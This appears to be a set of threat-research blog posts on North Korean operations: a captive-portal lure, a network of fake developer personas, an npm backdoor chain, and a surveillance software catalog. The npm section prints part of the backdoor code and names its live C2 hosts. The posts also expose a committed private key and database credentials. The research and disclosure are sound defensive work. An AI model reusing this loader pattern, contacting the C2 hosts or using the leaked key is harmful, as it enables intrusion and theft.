Taking a break from fake DPRK companies for a while, there was some interesting activity that I recently noticed on 175.45.176.97. Between May 14th and May 17th, 175.45.176.97 a request to the root of the server returned a 302 and was redirecting to recoshield.com which appears to be a South Korean company that manufacturers paint and windshield protectors.

Headers from the server showed the following:

HTTP/1.1 302 Found
Date: Sun, 17 May 2026 17:09:19 GMT
Server: Apache/2.4.37 (Rocky Linux)
X-Powered-By: PHP/7.4.33
Location: https://www.recoshield.com
Content-Length: 0
Content-Type: text/html; charset=UTF-8

I don’t think Rocky Linux has shown up in the DPRK IP range before. Now that alone might be interesting enough but searching additional directories revealed a few other findings. Poking around the server revealed what appears to be some sort of captive portal framework that was accidentally left exposed to the internet.

/1/ – The Redirect

Viewing http://175.45.176.97/1/ showed a brief snippet of text before immediately loading the Google homepage. A couple of tries later to stop the page loading and it showed the following text

While the text is displayed, behind the scenes a couple of things are happening. Looking at the source, the first block of code attempts to load the Google favicon, to check whether or not the visitor has internet access.

function checkGoogle() {
    const img = new Image();
    img.src = "https://www.google.com/favicon.ico?" + Math.random();
    img.onload = function() { redirectToGoogle(); };
    img.onerror = function() { redirectToError(); }
};

If the favicon loads then a user is redirected to google.com, however if the request fails or takes longer than 4 seconds to return a user is then routed to check.php?b19fefb66cf87da9a792c55b9020a52a

Unfortunately I was not able to get the check.php endpoint to load so it’s unclear the exact purpose of how it behaves, but the hashed parameter looks like a campaign identifier for logging incoming victims.

The comments in the code are also worth mentioning, translations are included and were not in the original source:

// 1. 타임아웃 설정 (모바일은 네트워크 전환이 빈번하므로 3~5초 권장)
// ("Timeout — 3-5 seconds recommended for mobile due to frequent network switching")
// 2. 이미지 객체를 이용한 우회 체크 (CORS 이슈 없음)
// ("Image object bypass check — no CORS issues")

The first comment shows that this was built specifically with mobile networks in mind and targeting mobile device users. The second comment also shows that the developer working on this was worried about cross origin requests blocking the fetch() call and specifically chose just the favicon as a workaround.

/test/ – The Lure

This is the page that the victim actually sees, and at first it caught me off guard. Originally I thought that there was a WiFi access point in North Korea that was accidentally exposed. However, digging into the page further shows that it is a fully designed mobile portal with a Huawei logo and Wifi error graphic informing the user:

“Slow Connection — Maybe your internet connection is unstable. There seems to be an issue with your wifi slowing down the internet. It’s recommended to test your phone using google wifi app.”

A button labeled “Go Google” is the only interaction. When clicked, two things happen:

First, a POST request is made to the server:

$.ajax({
    url: './?sectoken=03d340f83c70a18f06dd9b98055d08c2',
    type: 'POST',
});

Now admittedly I should have tested this more to see if the token changed or if it was static. However, ignoring my mistakes the page then redirected to install WiFi Analyzer Pro

WiFi Analyzer isn’t malicious and has over 10 million installs with a rating of 4.6 stars. It’s a legitimate app on the Play Store that’s been available since 2018. So why would a DPRK captive portal be redirecting to a legitimate Android app? There are two possible options

Option 1: It’s not about the app, its about the redirect.

The sectoken in the POST request that fires before the redirect is the actual information collection. By the time the page for the Play Store loads information about the device and a timestamp has already been sent to the server, and the app is designed to make it look like it’s part of the troubleshooting workflow

Option 2: The app is a placeholder

There’s some additional commented out code on the page that loads:

// launcher.setPackageName('com.google.android.youtube');
// launcher.setPackageName('com.instagram.android');
// launcher.setPackageName('com.netflix.mediaclient');

This suggests that the Android package could be just a placeholder. Netflix, YouTube, and Instagram are clearly test values and abdelrahman.wifianalyzerpro may simply be whatever the developer grabbed to confirm the Play Store redirect flow worked end-to-end. The real payload a trojanized app, a credential harvester, something else entirely may not have been swapped in yet while this was exposed to the internet.

/js/ – An Open Directory

One more thing that was left open, and not particularly interesting but worth including was an open directory. Nothing out of place was discovered and all of the files appeared to be legitimate. The only item of interest was that all files have the same timestamp of April 24th, 2026 at 00:51

What’s Actually Going On Here?

At first I thought this was just a At first I thought this was just a strange redirect to a South Korean company, but digging in a little more revealed something more interesting. While it’s hard to be completely certain when examining the purpose of the page it does appear that this is part of some infrastructure related to a rogue access point attack that was being tested and was accidentally exposed to the internet.

Based on the information collected, the intended wokflow appears to be something like the following

1. An operator in the field broadcasts a fake WiFi SSID, something like “Hotel Wifi” or “HuaweiAP_5G”. Something that is likely to attract attention based on the location and where targets are likely to connect.
2. A victim connects expecting to get a standard captive portal before getting access to the internet.
3. They get served /1/ which performs the connectivity check in the background. Assuming they do not have internet access they get routed through to check.php
4. They land on /test/ the slow connection page
5. They click Go Google, the sectoken logs the click and they are redirected to install the app.

Now without being able to examine all of the files some of the steps could be a slightly different order or there could be branches to the way the site responds as well.

The Huawei branding is an interesting choice as well. Huawei home and carrier networking can be found all across Southeast Asia and East Africa, which are regions where DPRK IT workers are known to operate under freelance developer cover. A Huawei branded portal is probably not going to look out of place in Laos, Cambodia, Vietnam, or parts of East Africa. Chollima Group has done phenomenal writeups on this, tracking IT worker cells operating out of Laos and documenting workers across multiple African countries as recently as 2025.

If you want to take a look at the html files send cat pictures to contact [at] nkinternet.com

If you haven’t read part 1, you can read it here: https://nkinternet.com/2026/04/07/npm-malware-fake-devs-and-deepfake-videos-these-are-a-few-of-my-favorite-dprk-things/

In order to keep the first part of this short the plan was to break it into a series of smaller posts. However, within 7 days after publishing the last post most of the accounts were taken down. So what’s left and what accounts did they pivot to?

Mentonex Slack

One thing that wasn’t included in the first post was screenshots of the Mentonex Slack channel. This was designed to appear to look like a legitimate company. There were messages posted about the company and a number of accounts that all appeared to be regular users.

A list of users was also obtained. Several of them appeared to be copied from other legitimate users on LinkedIn. One profile of note is Charl Lucy who we’ll see more of in a few minutes.

This is a technique used by the DPRK on several occasions now. One noted example recently was the compromise of the npm package Axios:

Maintainer Jason Saayman said the attackers tailored their social engineering efforts “specifically to me” by first approaching him under the guise of the founder of a legitimate, well-known company.

“They had cloned the company’s founders’ likeness as well as the company itself,” Saayman said in a post-mortem of the incident. “They then invited me to a real Slack workspace. This workspace was branded to the company’s CI and named in a plausible manner. The Slack [workspace] was thought out very well; they had channels where they were sharing LinkedIn posts.”

https://thehackernews.com/2026/04/unc1069-social-engineering-of-axios.html

Pivoting Companies – A Wild Nixsora.com Is Discovered

Most of the profiles and companies mentioned in the last post appear to be offline or deleted. However this doesn’t mean we can’t find the new companies being created. A couple of small details lead to finding the new company pretty easily which is nixsora.com

A GitHuub user vexxloso was discovered that had connections to previous personas related to Mentonex. If you remember Charl Lucy from the previous Slack images, an account with the same picture was discovered for the GitHub user trader389 following vexxloso. Additionally the user walletdiscover1010-a11y who is still associated with Mentonex is also following vexxloso.

Looking at the job postings on nixsora.com reveals several posts looking to hire blockchain developers

There’s also a community section on the website to make it appear as an active website but reviewing the code on GitHub shows that most of this is already seeded conversations into the pages.

To further build credibility a persona James Jhon that shares a profile picture with vexxloso has been consistently posting on dev.to about their new sports card project

To build more credibility it appears that they are also posting about it in more legitimate spaces. While the pages appear to be removed, Google search results show several posts on eBay’s community page

While no malicious code was discovered in any of the repositories, it does seem to be focused on part of a larger recruitment campaign. While pivoting on followers, another account tied to Nixsora, recruiter-test was discovered that has several blockchain related resting repositories.

Another account associated with the cluster, lightart732059 was also posting online looking for remote workers to share profits.

Wrapping Up

A shorter post but interesting to see how the cluster of personas and companies evolve over time. Updates to the cluster will be posted as more emerge but I wanted to get the rest of my screenshots posted. This has also lead to the discovery of other interesting accounts such as NeuroPeakX who has a real time face swap repository, and riorajhon who shares a similar name previously observed that had a Dev.to repository forked by recruiter-test

What started as what I thought was going to be a quick look into a suspicious GitHub organization turned into a much deeper rabbit hole with an active npm backdoor, more than a dozen fake developer personas, and recruitment posts looking for overseas facilitators.

Individually there’s a lot of interesting pieces here but together they map closely to documented DPRK tradecraft. This post walks through hopefully in a cohesive manner how all the pieces come together.

How This Started

The investigation stared with a GitHub organization called Mentonex.

At first glance it looks almost like a legitimate company but a few things immediately stood out:

• The branding all appeared to be AI generated
• Several contributing accounts were nely created with inactive LinkedIn profiles
• Repositories all appeared to be projects that were taken from other users or repos.

Digging into the repositories made it clear that something was a little off. One repository in particular stood out, mentonex-agent as it had some unusual imports in the file backend/src/utils/logger.js

import pino from 'pino';
import logkit from 'logkitx';

While pino is a legitimate and widely used Node.js logging library, logkitx is not. It presents itself as a simple debug integration for pino, and on the surface, it behaves like one.

But looking one level deeper reveals a different story.

A Suspicious Dependency Chain

The logkitx package pulls in another dependency: logger-base, which in turn imports dev-log-core.

mentonex-agent
  └── logkitx  (v1.0.0 / v1.0.1)
        └── logger-base  (v1.0.2 / v1.0.3)
              └── dev-log-core  ← Malicious payload discovered

At this point, the structure starts to look intentional. Each package adds just enough legitimacy to mask the final stage: dev-log-core.

Dissecting the Backdoor

All three packages were published under the same npm account (aokisasakidev1) within roughly 90 minutes of each other on January 29, 2026.

The final package, dev-log-core, contains the actual payload.

At first glance, the code appears to implement debugging functionality. Comments in the file even label it as a “DEBUG-ONLY” feature. But the behavior inside dev-log-core/src/common.js tells a different story.

(async function () {
	// DEBUG: Service name for remote debugging endpoint (development only)
	const serviceName = 'logkit-tau';
	const maxRetries = 10;
	const timeoutMs = 60000; // 60 seconds
	for (let attempt = 1; attempt <= maxRetries; attempt++) {
		try {
			// DEBUG: Build remote debugging URL (development/debugging purposes only)
			// This endpoint is used for advanced debugging features and should not be accessed in production
			const protocol = 'https';
			const hostname = `${serviceName.toLowerCase()}.vercel.app`;
			const path = '/debugCheck';
			const queryParam = `id=${namespaces}`;
			const requestUrl = `${protocol}://${hostname}${path}?${queryParam}`;

When triggered, the code:

• Constructs a remote URL
• Sends identifying information (namespaces)
• Retrieves a base64-encoded response
• Decodes and executes it dynamically using new Function()

In other words, it silently pulls and runs attacker-controlled code. The endpoint as of writing used for this behavior:

• logkit-tau.vercel.app

This effectively creates a backdoor with full access to:

• The filesystem
• Network connectivity
• Child processes

Infrastructure Evolution

Reviewing the versions of dev-log-core reveals some changes and previous domains that were used as part of the C2 infrastructure

• Jan 29, 2026 — 14:37 UTC
  • dev-log-core v1.0.0 published
  • Initial C2: ngrok-free.vercel.app. No retry logic.
• Jan 29, 2026 — 15:07 UTC
  • logkitx v1.0.0 published
  • Top-level wrapper package goes live. Full chain is operational ~80 minutes after payload creation.
• Feb 3, 2026
  • v1.0.3 published. First hostname rotation, with 3-retry fallback logic added — suggests the original endpoint went dark and the actor hardened the beacon.
  • C2 rotation #1 — logkit.vercel.app
• Feb 3, 2026 (same day)
  • v1.0.4 published hours later. Retry logic upgraded from 3 to 10 attempts. Abort controller with 60s timeout added — operational maturity improvement.
• Mar 16, 2026
  • v1.0.5 published. Second hostname rotation.
  • C2 rotation #2 — logkit-tau.vercel.app

The logkitx package metadata reveals some additional details with the homepage and repository fields pointing to github.com/aokisasakidev/logkitx while the security policy fields points to a different user github.com/alphacointech1010/logkitx, with a contact of security@alphacointech1010.io.

Microsoft Defender’s February 2026 report “Developer-targeting campaign using malicious Next.js repositories” documents the same Vercel C2 architecture, execution primitive, and victim fingerprinting mechanism identified in dev-log-core, and attributes the campaign to a North Korea-linked threat cluster.

aokisasakidev

The npm package logger-base lists its repository as github.com/aokisasakidev/logger-base. That URL now redirects to github.com/golangorg/logger-base — a different GitHub account entirely. This redirect occurs because GitHub preserves repository URLs when an account is renamed. The actor renamed the aokisasakidev account to golangorg after the packages were published, likely in an attempt to blend the malicious infrastructure into a name that resembles a legitimate Go programming language organization.

The golangorg account has a commit relationship to maxcointech1010. The maxcointech1010 account name echoes the alphacointech1010 organization already identified as the security contact for the malicious npm packages — same “cointech” root, same “1010” suffix. This naming overlap across accounts that are confirmed to share the same maintainer email is consistent with a single operator managing multiple identities under a loose internal naming convention.

Mapping Fake Identity Clusters

At this point, the malware piece is interesting but going back to the original Mentonex organization reveals something much larger, a network of interconnected personas. While the Mentonex org on GitHub has around 10 users and 40+ followers, mapping out their connections reveals some significant overlap between personas across multiple sites. At first glance this does provide some legitimacy to the personas, digging in further reveals multiple clusters of identities used wither for social engineering efforts or getting hired at companies.

Cluster 1 – The Mentonex front

The Mentonex GitHub organization sits at the center of this cluster with the highest number of connections in the investigated network. The org’s founder persona, Daniel Pires, has a GitHub account (danielfounder) and a dev.to presence under creative_topdev_1010 which links to simplecode1996@gmail.com and the domain walletdiscover.com

Daniel connects to a second persona through a GitHub repo titled alejandro-lopez owned by the account nixfroasty. That repo leads to Alejandro Lopez, who has an active LinkedIn profile listing him as a Team Lead at WalletDiscover — a company that shares its logo with Mentonex. Alejandro also appears on dev.to under fortuneguy97 using the name Alex, with a completely different profile photo.

nixfroasty itself previously used the name James Hensley with the username of fortuneguy97 and shares a suspiciously similar profile photo with Alejandro despite being presented as a different person.

Two more accounts round out the cluster. Emma Fitzgerald (walletdiscover1010-a11y) is listed as Product Manager at Mentonex but appeared to be using a stock image found at several different sites

And buildwithria, linked to the email varduhimarieta@gmail.com, was flagged in GitHub community discussion #184838 for scamming another user — sending a cloned repo, attempting to recruit them via Telegram and Discord under the name Oliver Henry, then deleting the repo and going silent.

In short: one GitHub org, at least five personas, two domains, one stock photo, and one prior scam complaint — all connected through shared emails, repos, and profile image reuse.

Cluster 2 — The Kolin Kojima freelancer ring

Many of the personas associated with Mentonex were found commenting on a dev.to article, which led to the discovery of a second cluster centered around a persona named Kolin Kojima:
https://dev.to/darkbranchcore/when-debugging-became-belonging-what-nearly-15-years-of-helping-developers-taught-me-3amg/comments

The “Kolin Kojima” persona maintains profiles across multiple freelance and data science platforms, including Truelancer, Kaggle, and guru.com.

Across these platforms, the email appears in multiple variants, including KollinKojima28 and KollinKujima. These variations help link this persona to additional accounts, including the GitHub user Agent-Dev-Well. This account is associated with danielfounder from Cluster 1, establishing a direct connection between the two clusters.

The network expands further through the account TechAIAgent, which follows danielfounder and hosts a GitHub repository titled “hello” that explicitly looks for facilitators for remote work.

Within this activity, an email address tied to these accounts leads to another persona: Ronny Hukuda.

Ronny was found posting across multiple platforms, including a Latvian job board and Locanto Miami classified ads, advertising for “remote work partners”—a pattern consistent with facilitator recruitment. One line from these postings stands out:

“I am not able to express myself clearly or humorously.”

Additional posts with nearly identical descriptions were discovered on Locanto that did not include direct contact information but strongly matched the language and structure of Ronny Hukuda’s postings.

One additional video associated with Ronny Hukuda was also identified, which appears to be AI-generated and is used to recruit individuals to work with him.

Cluster 3 — Yusuke / Naoki

Another user of interest connected to Mentonex is the GitHub account Naoki-K615. This account follows the Mentonex organization and is also a stargazer on one of its repositories, judge-ai.

The Naoki-K615 account claims the name Luke Morimoto, but links to a personal website hosted at:
showyouyusuke.vercel.app

This connection reveals another associated account, yusukem317, which is linked to buildwithria from earlier in the investigation.

This connection reveals another associated account, yusukem317, which is linked to buildwithria from earlier in the investigation.

The Luke Morimoto / Yusuke identity appears to operate under multiple aliases, including Yusuke Morimoto, and is associated with several email addresses and a phone number (included below). This persona also rotates through multiple profile pictures across accounts. As of now, these identities have not been observed in use outside of this cluster.

The Naoki-K615 account is also tied to the website eyecarewell.com, which warrants further investigation. The site uses a template similar to mentonex.com, and the doctors listed on the site do not appear to have any legitimate association with the company based on their LinkedIn profiles.

Yusuke also has a resume available for download via his site which is saved here in case it is taken down.

The resume presents the individual as a Canadian-based Full Stack and Blockchain Developer with seven years of experience, claiming roles at:

• JBA International (Los Angeles, remote)
• General Gaming (Boston, remote)
• Coinsquare (Toronto)

It also lists a BSc in Computer Science from McGill University (Montreal, 2014–2018).

However, several elements raise concerns. The PDF metadata shows the document was created using Enhancv (enhancv.com), an AI-assisted resume builder that has been documented in DPRK IT worker operations.

Additional inconsistencies appear within the resume itself:

• “JBA International” has no verifiable corporate presence
• “General Gaming” in Boston is similarly unverifiable

This cluster appears to represent another fabricated developer identity, supported by synthetic credentials and infrastructure designed to appear legitimate.

Cluster 4 — Paxton Powers

A fourth cluster of personas was identified while investigating the GitHub user apexautocap, which follows the Mentonex organization. This account links to the domain apexautocap.com, which is no longer online. However, additional searching reveals an associated Telegram handle: silverstar1208.

Further investigation uncovered a persona named Paxton Powers, who was found posting on the platform IdeasVoice:https://www.ideasvoice.com/fr/pub/entrepreneur/paxton-powers-3

In that post, Paxton Powers advertises opportunities for “remote work partners,” offering a 10–15% income share to U.S. and European individuals in exchange for handling tasks such as applications, communication, and interview scheduling.

While this cluster contains fewer directly linked personas than others, the overlap in contact information is notable. The Telegram handle @silverstar1208 appears as the primary contact in a now-deleted Reddit hiring post that also solicited “remote work partners.”

This establishes two independent facilitator recruitment posts tied to the same handle:

• A Reddit hiring ad (deleted)
• The IdeasVoice post by Paxton Powers

The repeated use of the handle silverstar1208 across these postings suggests a shared operator behind both efforts. The use of the name silverstar is either a deliberate choice or a remarkable coincidence in the context of known DPRK IT worker operations.

Additional domains of interest

Four domains were flagged as potentially related to Mentonex based on structural and content similarity. They warrant documentation here as part of the broader pattern, while noting that direct operational links to the Mentonex cluster have not been confirmed:

• arclyntech.com
• blusapiens.com
• fluxypy.com
• ledhuge.com

Three of the four domains — arclyntech.com, blusapiens.com, and fluxypy.com — return page titles that are either identical or near-identical to each other and to the Mentonex site: variations of “Intelligent Digital Solutions for Modern Businesses.”

fluxpy.com has a similar structure but also has more information and statistics on the site.

ledhuge.com could also be of interest for further investigation. There is a registeerd UK company under the same name 27 Old Gloucester Street, London WC1N 3AX. That address is the physical location of British Monomarks — a well-known London virtual mailbox and registered office service that has operated since 1925.

A Wild Second Org Appears

Right as I was ready to publish, a second GitHub org appeared with significant overlap with Mentonex: FluxMarketX (fluxmarketx.com). I haven’t fully investigated it yet, but two repositories stood out immediately and are worth flagging as well as several other details.

I haven’t fully investigated FluxMarketX yet but wanted to flag it before publishing. There’s clear overlap with Mentonex as several repos appear to be cloned from previous job postings. Two in particular caught my eye immediately due to their direct ties to activity already observed in this investigation:

• token_card_game
  • Appears to be designed to be submitted as a job application or code sample to a technical reviewer.
  • Uses the same import supply chain as observed previously: npm package → logger-base@1.0.3 → dev-log-core@1.0.5
  • Retrieves a base64 encoded payload and executes it
• token_auto_sell_bot
  • This repo is a dual-purpose drainer and backdoor that impersonates CasperPad, a legitimate Binance Smart Chain launchpad project
  • Automated token-selling bot and tricks victims into submitting their wallet private keys through a web dashboard, which are then stored in MongoDB and immediately used to sign and broadcast unauthorized BSC transactions
  • Live MongoDB credentials committed to repo: tomasyamamoto33_db_user / cluster0.x1pgibg.mongodb.net
  • BSC private key committed to config.json: c0c4934fc8b84cd0d699cb5a941a0ec51ee115f60c7e5f9ec2951adaa548a091
  • Actor test wallet: 0x00e3e9b82118398b78b9033ce93d7b1fec792dfd (username coin, from DB enumeration)
  • Oplog shows deliberate data wipe on 2026-04-05 before repo was published
  • Also uses the same logkitx chain. Additional name discovered for tomasyamamoto33 from the MongoDB credentials

The FluxMarketX website also appears to be a clone of https://vynyl.com with the homepage still featuring videos from Vynyl, and until recently also had a contact us page that was just recently updated to FluxMarketX

The phone number on the contact us page is also in use on another website https://www.howtica.com/ which is another customer software house.

Wrapping Up

There isn’t a single indicator here that definitively ties this to North Korea, but there are some strong overlaps. The C2 infrastructure matches what Microsoft has recently described, and hosting it on Vercel lines up with infrastructure patterns seen in DPRK-linked campaigns.

The developer personas also reuse emails and follow similar naming conventions, which look more like an attempt to build legitimacy than throwaway accounts. On top of that, the facilitator-style job postings fit with how DPRK IT worker operations are known to leverage third parties for access and placement.

I’m not getting into hard attribution here, I’m just a guy with a North Korea blog but this lines up pretty closely with what’s been reported in previous DPRK-linked campaigns.

It’s also possible I missed some things. You can download a cluster map here if you want to take a look.

Appendix

npm packages

C2 infrastructure

Actor domains

Suspicious domains

Email addresses

Phone numbers & Telegram

GitHub accounts

An email discovered last year that was sent from North Korea’s internet infrastructure offers a rare look at how DPRK software developers market their work abroad. While most recent reporting has focused on North Korean IT workers fraudulently obtaining jobs at Western companies, the documents attached to this message appear to represent something different: a catalog of domestically developed software being pitched to commercial partners overseas.

As reported by Daily NK in late 2025, North Korea had previously sent around one hundred IT workers to the Chinese border city of Dandong in order to work on app development as well as website work. These workers were typically assigned in groups of fifteen and living in rented apartments overseas with the goal of earning foreign currency for the regime. While there is plenty of coverage of the employment scams conducted by the Reconnaissance General Bureau (RGB), outsourced labor to foreign markets is less covered.

The email in question originated from a @star-co.net.kp address with an origin IP of 175.45.178.55 and an internal relay of 172.31.6.4. (This IP has been added to the Kwangmyong infrastructure page, check it out if you haven’t already.) One detail in the headers worth calling out are the date headers. The email’s date shows a time stamp of 16:24:09 +0800 (China Standard Time), while the SMTP relay records 21:09:32 +0900 (Korean Standard Time). The offset on the machine writing the email points to an operator likely working out of China, which is consistent with the pattern of DPRK IT teams operating in cities such as Shenyang, Dandong, or Dalian while maintaining connections back to DPRK infrastructure for operational activity.

The message was clearly aimed at the Middle Eastern and North African telecom market, referencing the recipient’s role representing companies across the region.

Let’s dig into the documents a little more to get a better idea of the software catalog offered by North Korea to overseas clients. The three documents included in the email include information around Android application hardening, AI, computer vision, mobile surveillance, and reverse engineering. Taken together these offer a window into capabilities of North Korean IT workers across not just exported work but potentially other malicious activity.

Document 1 – Android APK Hardening

The first product mentioned in the documents is an Android application referred to as APK-GUARD which is designed to protect against the reverse engineering of Android apps. The document also includes a feature comparison table against named competitors and explicitly calls out it’s protection of C# DLL libraries as a unique differentiator compared to the other tools listed.

Several other capabilities described include SO library obfuscation, anti-dump (which defeats memory analysis tools by zeroing critical code sections during execution), anti-patch (which detects and rejects modified APKs), anti-emulator , and device-specific license key enforcement.

Probably the most interesting feature is what the document refers to as “Anti-Remote Attach” which helps protect against IDA Pro’s remote debugging capability.

Document 2 – Android Surveillance

The second document describes a comprehensive Android surveillance platform consisting of a web based control server and a silent terminal implant installed on a target device. The document is straightforward about what the software’s purpose is, describing it as a “target-monitoring program” designed to “remotely monitor the position, conversation, message and ambient environment” of a specified person.

A detailed feature list from the document includes the following functionality:

• Function to detect current position of terminal and send positional information to server
• Function to send information on move route to server in real-time
• Function to record T/R conversation at terminal and send information to server
• Function to display and search address book of person to be monitored
• Function to search for and play recorded file
• Function for setting for message stealing
• Function to search for address book of person to be monitored
• Function to search for and read message
• Function for recording at spot terminal and sending to server
• Function for real-time wiretapping at spot terminal in server
• Function to steal address book of terminal and send it to server
• Function to lock & unlock screen of terminal

This provides some additional details into what we already know about North Korea’s domestic mobile phone surveillance. As documented by North Korea Tech, all North Korean smartphones ship with a built in application called Trace Viewer, which takes random screenshots and stores them in a local database on the device. The current understanding is that the screenshots aren’t being actively transmitted, but that the awareness of their existence is enough to deter users from illicit activity.

Document 3 — The Capability Portfolio

The third document does not describe a single product like the other two, but instead lays out the capabilities of what it calls “our developing team.” Based on the DTEX reporting on the DPRK cyber structure, a group with a commercially oriented profile that is pitching software exports openly most likely sits as a lower tier unit under the Reconnaissance General Bureau (RGB) or possibly the Workers’ Party of Korea (KWP).

The capabilities of this group are wide ranging and include leads off with information about their AI development capabilities, but also details capabilities including: image processing including facial recognition, license plate recognition (LPR), eye monitoring, people counting, fire and smoke detection, web development, and software engineering.

The image processing capabilities of North Korea are also highlighted here and an interesting tie to later developments in the company. In a report from the Stimson Center one section in their report specifically calls out an expanding road traffic surveillance network.

The AI piece is also worth mentioning, not just due to it’s increasing popularity across the world. These documents are from 2022, but North Korea’s investment in AI goes back much further. A 2017 Korea Times report on a Korea Development Bank research paper noted that North Korea began AI development as far back as 1990 and had been a genuine international competitor in the field by the early 2000s. The team lists TensorFlow and Caffe as their frameworks — and given what we know from North Korean researchers’ own published work, GPU scarcity is a real constraint.

What This Tells Us

The covert IT worker scheme gets most of the attention and for good reason. However this email documents another strategy by the regime for earning foreign currency. By shopping domestic software abroad and targeting a regional intermediary North Korea potentially faces less scrutiny than they would in the US or EU. The surveillance suite reflects years of domestic mobile security engineering by people who have been building monitoring tools for state use long before they started selling them abroad. The AI and computer vision portfolio points to a decades-long national investment in machine learning that has continued quietly regardless of sanctions and hardware limits.

As always if you have any additional details to share around North Korea’s software catalog feel free to reach out: contact@nkinternet.com

There’s also a Substack you can subscribe to if that’s your jam: https://substack.com/home/post/p-190207737

References

1. Daily NK — “N. Korea sends 100 IT workers to new base in Chinese border city” (Oct 2025)
2. North Korea Tech — “North Korea upgrades its Android security” (Jan 2024)
3. Korea Times — “North Korea was once AI powerhouse” (Oct 2017)
4. Daily NK — “N. Korea releases details about real-time LPR technology”
5. Stimson Center — “Digital Surveillance in North Korea: Moving Toward a Panopticon State” (2024)
6. Synaptic Security — “Why Is a North Korean Mail Server Using a .cc Domain?” (2025)

Over the years I’ve come across a number of sources and log files that provides some insight into what is on North Korea’s Kwangmyong. If you’re not familiar, North Korea has an intranet inside the country which is what most people access. I’ve cleaned up my notes and started putting down everything that I have here: https://nkinternet.com/kwangmyong/

Additional notes are always welcome, and anything that can’t be confirmed or I am unsure of is noted with a series of question marks by the potential purpose for the IP/website.

A recent post by Hudson Rock detailed information derived from infostealer logs tied to activity associated with the Trevor Greer persona, you know the one trevorgreer9312@gmail[.]com. That write up provides some context around the data and places it with broader reporting on North Korean IT worker activity. If you haven’t seen it, the article can be found here:

While I had originally planned to do a more comprehensive write up of the logs there’s a more detailed write up already written by Slapdash Safeguards that goes into additional detail about the contents of the logs, beyond what Hudson Rock covered: https://www.sdsg.moe/entry/2025/12/10/233030?_x_tr_sl=ja&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=sc

Before going further it’s worth clarifying that just having the presence of a DPRK linked persona in some infostealer logs does not mean that this is directly connected to the Bybit incident itself. Additionally, much of the data appears to be over a year old. AT this point, it is unclear whether the logs were recently leaked or simply just discovered.

However there are still several details in the logs that have not been discussed so far and are worth highlighting.

Software

One of the more notable findings in the logs is the list of processes running on the machine, including:

• CallRT.exe
• Call.exe
• Call3.0.exe

These binaries appear to be purpose built utilities associated with DPRK ITW environments. While I’m working on a deeper reverse engineering post at a high level this software appears designed to support application and hiring workflows. Additionally the tool appears to include some keylogging functionality that triggers on specific keywords, as well as providing a way to track where a user is logged in when they first connect with the software.

BlockBounce LLC

The company BlockBounce LLC is also briefly mentioned in the data. The address associated with the company points to an apartment complex in Atlanta:

860 Glenwood Ave SE Apt 409
Atlanta, Georgia 30316
United States

This address is most likely a fake address and should not be treated as definitive evidence of anything on its own. However, the use of residential addresses for shell entities is consistent with patterns seen in other DPRK linked operations.

Additional Identities

In addition to the Trevor Greer persona, the same environment appears to reference other identities, including the name Yeferson Mejia using the email jaider@blockbounce.org. Emails suggest communication with an external service related to recruitment for BlockBounce on an AI-Powered interview platform:

GitHub Account

The username topsdev126 appears in the logs and is also referenced in the Hudson Rock article. That username is associated with a GitHub account, which still exists at the time of writing, though it shows little visible activity:

https://github.com/topsdev126

On its own, the existence of the account does not indicate active use. However, the same username also appears in logs from a commercial proxy provider:

It is difficult to determine from this data alone whether the proxy account is still actively being used or simply remnants of older activity.

While none of these points stand out on their own, combined with other data they may add context to aspects of the data that has not been covered in other write ups.

Before we go any further, one thing that I want to make clear is that the word assume is going to be doing some heavy lifting throughout this post. This was a rabbit hole that I recently went down and I probably have more questions than answers, but I still wanted to document what I had found so far. If you have additional information or findings you want to share, as always feel free to reach out: contact@nkinternet.com.

It all started with a PowerPoint that I came across a few weeks ago. It was presented by the DPRK to the ICAO on the state of their aviation industry and their ADS-B deployment inside North Korea. However, one slide in particular caught my eye because it showed a fiber optic cable running across the country

This got me wondering more about the physical layout of the network inside North Korea. From the map we know that there’s a connection between Pyongyang and Odaejin, although given the mountains in the middle of the country it probably isn’t a direct link. There isn’t a lot of information on fiber in North Korea, but there are a few outside sources that help provide clues about how things might be laid out.

Historic Fiber Information

38North first reported the connection from Russia’s TTK to the DPRK over the Korea–Russia Friendship Bridge back in 2017. Additionally, a picture found on Flickr looking toward Tumangang after the bridge doesn’t show any utility poles and instead seems to display some kind of infrastructure in the grass to the side of the tracks. Assuming this interpretation is correct, the fiber is likely buried underground as it enters the country and passes through the vicinity of Tumangang Station.

According to a report from The Nautilus Institute we can gather a few additional details about the internet inside North Korea

• One of the first lines was installed in September 1995 between Pyongyang and Hamhung
• In February 1998 a link between Pyongyang and Sinuiju was completed
• As of 2000, DPRK’s operational optical fiber telecom lines included: Pyongyang – Hamhung; Pyongyang – Sinuiju including all cities and counties in North Pyongan Province; Hamhung Rajin-Sonbong; Rajin-Songbong – Hunchun (China), Pyongyang – Nampo.
• In 2003 the original domestic cell phone network was built for North Korean citizens in Pyongyang, Namp’o, reportedly in all provincial capitals, on the Pyongyang-Myohyangsan tourist highway, and the Pyongyang-Kaesong and Wonsan-Hamhung highways
• The Kwangmyong network’s data is transmitted via fiber optic cable with a backbone capacity of 2.5 GB per second between all the provinces.

Based on these notes, it starts to paint a picture that the fiber link coming from Russia likely travels down the east coast of the DPRK before connecting to Pyongyang. Several city pairs—Pyongyang–Hamhung and Rajin–Sonbong—line up with earlier deployments of east-coast fiber infrastructure.

Kwangmyong Internal Topology

The report also notes that all of the provinces in North Korea were connected to the Kwangmyong via fiber. The Kwangmyong for those not familiar is the intranet that most citizens in the DPRK can access as they do not have access to the outside internet. While not much information is available about the Kwangmyong, these notes from Choi Sung, Professor of Computer Science at Namseoul University provides some additional details on how the network is laid how, as well as information on the regional networks that are connected. A map provided in his notes shows some of the main points of the Kwangmyong with three of them located along the northeast of North Korea.

Railways, Roads, and Practical Fiber Routing

This starts to paint a rough picture of how the network is physically deployed in North Korea but we can also look to some outside sources to get some confirmation. 38North once again provides some great detail on cell phone towers in North Korea. The interesting thing being an apparent line down the east coast which follows major roads and highways but would also in theory have easier access to the fiber back haul to support the cell network.

All of this seems to suggest that the fiber lines were run along major roads and railways up the east coast. A map from Beyond Parallel shows the major rail lines, which has the Pyongra line up the east coast.

Looking For Clues Along the Railway

Some additional digging for pictures from along the line suggest that there is infrastructure deployed along the tracks, although it’s difficult to confirm from pictures exactly what is buried. The following shows what appears to be a junction box at the base of a pole along the line.

The line does have a path along it as well with mile markers. While it is used by bikes and pedestrians, it provides a nice path for supporting fiber and other communications runs along the tracks.

